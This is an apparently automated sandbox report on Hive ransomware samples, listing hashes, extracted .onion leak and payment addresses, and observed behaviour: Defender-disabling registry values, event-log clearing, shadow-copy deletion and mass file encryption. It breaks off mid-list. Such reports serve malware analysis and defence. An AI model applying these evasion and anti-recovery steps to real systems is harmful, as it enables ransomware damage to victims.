Overview
overview
10Static
static
8211xahcou.exe
windows7-x64
10211xahcou.exe
windows10-2004-x64
10hive.exe
windows7-x64
10hive.exe
windows10-2004-x64
10sjl8j6ap3.exe
windows7-x64
1sjl8j6ap3.exe
windows10-2004-x64
1windows_25...c5.exe
windows7-x64
10windows_25...c5.exe
windows10-2004-x64
10zi1ysv64h.exe
windows7-x64
10zi1ysv64h.exe
windows10-2004-x64
10Resubmissions
23/12/2022, 20:19
221223-y39gvahb28 1023/12/2022, 19:54
221223-ymz88scc8w 1023/12/2022, 19:42
221223-yerbcsha78 10Analysis
-
max time kernel
135s -
max time network
93s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
23/12/2022, 19:42
Behavioral task
behavioral1
Sample
211xahcou.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
211xahcou.exe
Resource
win10v2004-20220901-en
Behavioral task
behavioral3
Sample
hive.exe
Resource
win7-20221111-en
Behavioral task
behavioral4
Sample
hive.exe
Resource
win10v2004-20220812-en
Behavioral task
behavioral5
Sample
sjl8j6ap3.exe
Resource
win7-20220812-en
Behavioral task
behavioral6
Sample
sjl8j6ap3.exe
Resource
win10v2004-20221111-en
Behavioral task
behavioral7
Sample
windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
Resource
win7-20221111-en
Behavioral task
behavioral8
Sample
windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
Resource
win10v2004-20220812-en
Behavioral task
behavioral9
Sample
zi1ysv64h.exe
Resource
win7-20221111-en
General
-
Target
windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
-
Size
884KB
-
MD5
da13022097518d123a91a3958be326da
-
SHA1
24a71ab462594d5a159bbf176588af951aba1381
-
SHA256
25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5
-
SHA512
a82aa97a92cd21ee2d4b556448fd3293396eb7c01d3626ebdb6c3816277783578686830c430014b6b2fc3280bc1301df27da079937f88834c2d35641eb5fc26f
-
SSDEEP
12288:Sw41dVZvThPCsM18GLHe7wlDdkPAQEtxr0fflvRmhEBWtdUJiAUtP/T/kAfMvgVt:dod1HDmlDdkZ4YXPpaTTXMw
Malware Config
Extracted
C:\EGdu_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Hive
A ransomware written in Golang first seen in June 2021.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs 3 IoCs
pid Process 1340 wevtutil.exe 4544 wevtutil.exe 2072 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies extensions of user files 8 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File opened for modification C:\Users\Admin\Pictures\PublishConnect.png.cUlvoIO5vsp2OVHe3BdEExjxOc4tqw316WcYgkhFn_9qmWX0n8HLDerZamfaRdtf.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File renamed C:\Users\Admin\Pictures\RedoComplete.crw => C:\Users\Admin\Pictures\RedoComplete.crw.cUlvoIO5vsp2OVHe3BdEExjxOc4tqw316WcYgkhFn_9AY37H5KFDNrXxUhOtPy0K.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Users\Admin\Pictures\RedoComplete.crw.cUlvoIO5vsp2OVHe3BdEExjxOc4tqw316WcYgkhFn_9AY37H5KFDNrXxUhOtPy0K.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File renamed C:\Users\Admin\Pictures\ResolveResize.tiff => C:\Users\Admin\Pictures\ResolveResize.tiff.cUlvoIO5vsp2OVHe3BdEExjxOc4tqw316WcYgkhFn__Us4YzOhXZMUNOQzc3tfEs.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Users\Admin\Pictures\ResolveResize.tiff.cUlvoIO5vsp2OVHe3BdEExjxOc4tqw316WcYgkhFn__Us4YzOhXZMUNOQzc3tfEs.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File renamed C:\Users\Admin\Pictures\StopBlock.tif => C:\Users\Admin\Pictures\StopBlock.tif.cUlvoIO5vsp2OVHe3BdEExjxOc4tqw316WcYgkhFn_9GiVhrZyA8GuRQqlmuPQ0R.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Users\Admin\Pictures\StopBlock.tif.cUlvoIO5vsp2OVHe3BdEExjxOc4tqw316WcYgkhFn_9GiVhrZyA8GuRQqlmuPQ0R.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File renamed C:\Users\Admin\Pictures\PublishConnect.png => C:\Users\Admin\Pictures\PublishConnect.png.cUlvoIO5vsp2OVHe3BdEExjxOc4tqw316WcYgkhFn_9qmWX0n8HLDerZamfaRdtf.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe -
resource yara_rule behavioral8/memory/4104-132-0x0000000000E50000-0x0000000001162000-memory.dmp upx behavioral8/memory/4104-133-0x0000000000E50000-0x0000000001162000-memory.dmp upx -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudent2019R_Retail-ul-phn.xrm-ms.cUlvoIO5vsp2OVHe3BdEExjxOc4tqw316WcYgkhFn_92n9zK5S4GLHCVwx0vVXxz.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\stickers\word_art\sticker20.png windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ca-es\ui-strings.js.cUlvoIO5vsp2OVHe3BdEExjxOc4tqw316WcYgkhFn_8rS9OzWqO1JIJ5IPrEZiNX.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\InsiderHubAppList.targetsize-72.png windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxMailAppList.targetsize-16.png windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.nl_ja_4.4.0.v20140623020002.jar.cUlvoIO5vsp2OVHe3BdEExjxOc4tqw316WcYgkhFn_9WQaBFDnBYDFa4DxQotWYT.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\Weather_BadgeLogo.scale-100.png windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-60_altform-unplated.png windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.NET.Native.Runtime.1.7_1.7.25531.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\Autogen\JSByteCodeCache_64 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Home\LTR\contrast-black\LargeTile.scale-100.png windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarAppList.targetsize-30_altform-unplated.png windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\br.gif.cUlvoIO5vsp2OVHe3BdEExjxOc4tqw316WcYgkhFn_8MabDJ61ODNVbuPAubGTIG.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\base_uris.js.cUlvoIO5vsp2OVHe3BdEExjxOc4tqw316WcYgkhFn__GRtovGjBcOTAFf8XdHG8R.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStd2019R_Grace-ul-oob.xrm-ms.cUlvoIO5vsp2OVHe3BdEExjxOc4tqw316WcYgkhFn_-PMKGKCumCNue-XesMV-Qs.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\WordR_Trial-pl.xrm-ms.cUlvoIO5vsp2OVHe3BdEExjxOc4tqw316WcYgkhFn_9E-Qoi8KGEb5hxTbIU-FkO.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsStore_11910.1002.5.0_neutral_split.scale-100_8wekyb3d8bbwe\AppxManifest.xml windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File created C:\Program Files\Microsoft Office\root\Office16\MSIPC\ko\EGdu_HOW_TO_DECRYPT.txt windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\cstm_brand_preview2x.png.cUlvoIO5vsp2OVHe3BdEExjxOc4tqw316WcYgkhFn_-8hKnijPosP6BxdDDUkAcu.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Common Files\System\Ole DB\sqlxmlx.rll windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\ModuleAutoDeps\EGdu_HOW_TO_DECRYPT.txt windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-20_contrast-black.png windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\en-us\mso.acl windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Windows Media Player\Network Sharing\wmpnss_color32.bmp windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteAppList.targetsize-256.png windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.targetsize-24_altform-unplated.png windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-black\Logo.scale-100_contrast-black.png windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarWideTile.scale-200.png windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\EGdu_HOW_TO_DECRYPT.txt windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\screenshots@mozilla.org.xpi.cUlvoIO5vsp2OVHe3BdEExjxOc4tqw316WcYgkhFn_828nlqvF9sLbIDMMEMugFo.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteAppList.scale-100.png windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\WorldClockSmallTile.contrast-white_scale-100.png windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubAppList.targetsize-16_altform-unplated.png windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\ExchangeWideTile.scale-200.png windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\de-DE\sqlxmlx.rll.mui windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ipshe.xml windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNotePageWideTile.scale-100.png windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\en-US\InkObj.dll.mui windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\AccessR_Trial-ppd.xrm-ms.cUlvoIO5vsp2OVHe3BdEExjxOc4tqw316WcYgkhFn_8Teed9lklGUMg97OTOdcx8.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\tool\plugin.js.cUlvoIO5vsp2OVHe3BdEExjxOc4tqw316WcYgkhFn__BdOBAN6aPenoJvrLi9H8b.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\en-il\EGdu_HOW_TO_DECRYPT.txt windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_OEM_Perp4-ul-oob.xrm-ms.cUlvoIO5vsp2OVHe3BdEExjxOc4tqw316WcYgkhFn_9uVvdsQ1lzC2A0WIEUho1h.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\CompleteCheckmark2x.png.cUlvoIO5vsp2OVHe3BdEExjxOc4tqw316WcYgkhFn_93GIMvWFVoXS_-5yqaznoC.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File created C:\Program Files\Microsoft Office\root\Office16\MSIPC\et\EGdu_HOW_TO_DECRYPT.txt windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.UI.Xaml.2.0_2.1810.18004.0_x64__8wekyb3d8bbwe\Microsoft.UI.Xaml.winmd windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File created C:\Program Files\Java\jre1.8.0_66\lib\fonts\EGdu_HOW_TO_DECRYPT.txt windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sampler_zh_CN.jar.cUlvoIO5vsp2OVHe3BdEExjxOc4tqw316WcYgkhFn__96qEkjXeEJB2hXoSPCntA.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\VBA\VBA7.1\1033\VBCN6.CHM.cUlvoIO5vsp2OVHe3BdEExjxOc4tqw316WcYgkhFn__L7hQ04TdcKvLN3UTfgU8J.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNotePageMedTile.scale-150.png windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\uk-ua\ui-strings.js.cUlvoIO5vsp2OVHe3BdEExjxOc4tqw316WcYgkhFn_-DMMew7es-dfx-60RvYvc8.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\zh-tw\ui-strings.js.cUlvoIO5vsp2OVHe3BdEExjxOc4tqw316WcYgkhFn_9ggHsWagIuSHjFz4bTyFlV.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\en-US\mip.exe.mui windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-80.png windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\GenericMailMediumTile.scale-100.png windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\org-netbeans-core-execution.xml_hidden.cUlvoIO5vsp2OVHe3BdEExjxOc4tqw316WcYgkhFn_8cWE6A2Ek3TzIm-kDYWYt4.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\ui-strings.js.cUlvoIO5vsp2OVHe3BdEExjxOc4tqw316WcYgkhFn_9eE4FLraEVdYj4P3rRSkou.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\ink\de-DE\InkObj.dll.mui.cUlvoIO5vsp2OVHe3BdEExjxOc4tqw316WcYgkhFn_-afb6Cu60xehrHgsBpRmR1.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\InsiderHubAppList.targetsize-36.png windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\themes\dark\bg_patterns_header.png.cUlvoIO5vsp2OVHe3BdEExjxOc4tqw316WcYgkhFn__43a3w0cRLBw22SbYsFe91.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\en-gb\ui-strings.js.cUlvoIO5vsp2OVHe3BdEExjxOc4tqw316WcYgkhFn_9wWpGYSYxRNVoxJSs-wuUE.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\fi-fi\EGdu_HOW_TO_DECRYPT.txt windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-api-visual_zh_CN.jar.cUlvoIO5vsp2OVHe3BdEExjxOc4tqw316WcYgkhFn_-oG2fPpe6qLF6M5R8vV-YB.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_2019.125.2243.0_neutral_~_8wekyb3d8bbwe\AppxSignature.p7x windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\resources\strings\LocalizedStrings_zh-TW.json windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe -
Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1432 sc.exe 2468 sc.exe 4288 sc.exe 3420 sc.exe 2760 sc.exe 4364 sc.exe 2172 sc.exe 4972 sc.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 4076 powershell.exe 4076 powershell.exe 4860 powershell.exe 4860 powershell.exe 4104 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 4104 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeSecurityPrivilege 1340 wevtutil.exe Token: SeBackupPrivilege 1340 wevtutil.exe Token: SeSecurityPrivilege 4544 wevtutil.exe Token: SeBackupPrivilege 4544 wevtutil.exe Token: SeSecurityPrivilege 2072 wevtutil.exe Token: SeBackupPrivilege 2072 wevtutil.exe Token: SeIncreaseQuotaPrivilege 864 wmic.exe Token: SeSecurityPrivilege 864 wmic.exe Token: SeTakeOwnershipPrivilege 864 wmic.exe Token: SeLoadDriverPrivilege 864 wmic.exe Token: SeSystemProfilePrivilege 864 wmic.exe Token: SeSystemtimePrivilege 864 wmic.exe Token: SeProfSingleProcessPrivilege 864 wmic.exe Token: SeIncBasePriorityPrivilege 864 wmic.exe Token: SeCreatePagefilePrivilege 864 wmic.exe Token: SeBackupPrivilege 864 wmic.exe Token: SeRestorePrivilege 864 wmic.exe Token: SeShutdownPrivilege 864 wmic.exe Token: SeDebugPrivilege 864 wmic.exe Token: SeSystemEnvironmentPrivilege 864 wmic.exe Token: SeRemoteShutdownPrivilege 864 wmic.exe Token: SeUndockPrivilege 864 wmic.exe Token: SeManageVolumePrivilege 864 wmic.exe Token: 33 864 wmic.exe Token: 34 864 wmic.exe Token: 35 864 wmic.exe Token: 36 864 wmic.exe Token: SeIncreaseQuotaPrivilege 3828 wmic.exe Token: SeSecurityPrivilege 3828 wmic.exe Token: SeTakeOwnershipPrivilege 3828 wmic.exe Token: SeLoadDriverPrivilege 3828 wmic.exe Token: SeSystemProfilePrivilege 3828 wmic.exe Token: SeSystemtimePrivilege 3828 wmic.exe Token: SeProfSingleProcessPrivilege 3828 wmic.exe Token: SeIncBasePriorityPrivilege 3828 wmic.exe Token: SeCreatePagefilePrivilege 3828 wmic.exe Token: SeBackupPrivilege 3828 wmic.exe Token: SeRestorePrivilege 3828 wmic.exe Token: SeShutdownPrivilege 3828 wmic.exe Token: SeDebugPrivilege 3828 wmic.exe Token: SeSystemEnvironmentPrivilege 3828 wmic.exe Token: SeRemoteShutdownPrivilege 3828 wmic.exe Token: SeUndockPrivilege 3828 wmic.exe Token: SeManageVolumePrivilege 3828 wmic.exe Token: 33 3828 wmic.exe Token: 34 3828 wmic.exe Token: 35 3828 wmic.exe Token: 36 3828 wmic.exe Token: SeIncreaseQuotaPrivilege 3828 wmic.exe Token: SeSecurityPrivilege 3828 wmic.exe Token: SeTakeOwnershipPrivilege 3828 wmic.exe Token: SeLoadDriverPrivilege 3828 